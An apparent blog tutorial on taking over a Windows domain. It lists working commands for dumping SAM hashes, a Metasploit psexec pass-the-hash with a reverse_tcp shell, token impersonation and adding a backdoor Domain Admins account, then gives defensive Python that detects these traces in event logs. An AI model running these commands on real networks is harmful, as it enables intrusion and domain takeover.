How to own a Windows Domain 2.0
Back in October we showed you a video on how to own a Windows domain by passing the hash of the local Administrator account to the domain server and adding a new domain admin account. This newer version makes the task much easier using BackTrack 4 and Metasploit.
The commands used in the video:
# Offline, from the booted BackTrack 4 system:
mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM

# In msfconsole:
msfconsole
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=123...:5654... -j
sessions -i 1

# In the Meterpreter session:
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain
PWNED :)
Lessons learned:
1. Never reuse admin passwords, even if they are technically unbreakable: the hash is passed as-is, so the password is never cracked and its strength does not matter.
2. Everything is a lot easier with the right tools.
The attack works against WinXP/Vista/Win7/Windows Server 2k3/Windows Server 2k7.
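For the defenders reading this, the chain above leaves two recognisable traces in the Windows Security log: NTLM network logons by a local Administrator account fanning out from one source to several hosts (the pass-the-hash step), and a brand-new account landing in Domain Admins seconds after it was created (the two net commands). The following detection logic is an added example written for this page, not code from the video or from BackTrack/Metasploit. The event records are constructed samples shaped like Security log fields (event IDs 4624, 4720 and 4728 are the real Windows IDs; the SIDs, host names and times are made up), and the 10-minute correlation window and the two-host threshold are assumptions to tune for your environment.

```python
"""Detect the log traces of pass-the-hash lateral movement and of a fresh
account being added straight into a privileged group.

Added example for this page, not the video's own tooling. Event records
are constructed samples in the shape of Windows Security log fields."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Field names follow the
# Windows Security log schema: 4624 = logon, 4720 = user account created,
# 4728 = member added to a security-enabled global group. SIDs, hosts and
# timestamps are made up.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2010-03-01T10:00:00", "Computer": "FILESRV01",
     "TargetUserName": "Administrator", "TargetDomainName": "FILESRV01",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.1.160"},
    {"EventID": 4624, "TimeCreated": "2010-03-01T10:00:20", "Computer": "DC01",
     "TargetUserName": "Administrator", "TargetDomainName": "DC01",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.1.160"},
    {"EventID": 4624, "TimeCreated": "2010-03-01T10:05:00", "Computer": "WS07",
     "TargetUserName": "jsmith", "TargetDomainName": "MYDOMAIN",
     "LogonType": 2, "AuthenticationPackageName": "Kerberos", "IpAddress": "-"},
    {"EventID": 4720, "TimeCreated": "2010-03-01T10:02:10", "Computer": "DC01",
     "SubjectUserName": "domainadmin", "TargetUserName": "hack",
     "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4728, "TimeCreated": "2010-03-01T10:02:15", "Computer": "DC01",
     "SubjectUserName": "domainadmin", "TargetUserName": "Domain Admins",
     "MemberName": "CN=hack,CN=Users,DC=mydomain,DC=local",
     "MemberSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4720, "TimeCreated": "2010-03-01T11:30:00", "Computer": "DC01",
     "SubjectUserName": "helpdesk", "TargetUserName": "jdoe",
     "TargetSid": "S-1-5-21-1111-2222-3333-1106"},
    {"EventID": 4728, "TimeCreated": "2010-03-02T09:00:00", "Computer": "DC01",
     "SubjectUserName": "helpdesk", "TargetUserName": "Sales",
     "MemberName": "CN=jdoe,CN=Users,DC=mydomain,DC=local",
     "MemberSid": "S-1-5-21-1111-2222-3333-1106"},
]

# Groups whose membership changes should always be reviewed.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}


def _when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def local_admin_ntlm_fanout(events, min_hosts=2):
    """Source addresses whose NTLM network logons (type 3) as a *local*
    Administrator (TargetDomainName equals the host name, so not a domain
    account) reach at least min_hosts distinct computers.
    A legitimate admin rarely does this; a passed hash does it by design.
    Returns {source_ip: sorted list of target hosts}."""
    targets = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4624 and e.get("LogonType") == 3
                and e.get("AuthenticationPackageName") == "NTLM"
                and e.get("TargetUserName") == "Administrator"
                and e.get("TargetDomainName") == e.get("Computer")):
            targets[e["IpAddress"]].add(e["Computer"])
    return {ip: sorted(hosts) for ip, hosts in targets.items() if len(hosts) >= min_hosts}


def new_account_into_privileged_group(events, window=timedelta(minutes=10),
                                      watched=PRIVILEGED_GROUPS):
    """Pair each 4720 with a later 4728 into a watched group for the same
    SID within `window`. Correlating on SID rather than account name
    survives renames between the two events."""
    created = {}   # SID -> 4720 event
    alerts = []
    for e in sorted(events, key=_when):
        if e["EventID"] == 4720:
            created[e["TargetSid"]] = e
        elif e["EventID"] == 4728 and e.get("TargetUserName") in watched:
            origin = created.get(e.get("MemberSid"))
            if origin is not None and _when(e) - _when(origin) <= window:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "group": e["TargetUserName"],
                    "added_by": e["SubjectUserName"],
                    "seconds_after_creation": int((_when(e) - _when(origin)).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for ip, hosts in local_admin_ntlm_fanout(SAMPLE_EVENTS).items():
        print(f"local Administrator NTLM logons from {ip} to {len(hosts)} hosts: {hosts}")
    for a in new_account_into_privileged_group(SAMPLE_EVENTS):
        print(f"{a['account']} created and added to {a['group']} by {a['added_by']} "
              f"{a['seconds_after_creation']}s later")
```

On the constructed sample the first check flags 192.168.1.160 reaching FILESRV01 and DC01 as a local Administrator over NTLM, and the second flags "hack" joining Domain Admins five seconds after creation, while the helpdesk account that joins Sales a day later stays quiet. Both checks need the relevant audit subcategories (Logon and Security Group Management) enabled and the events forwarded from member servers as well as the domain controllers.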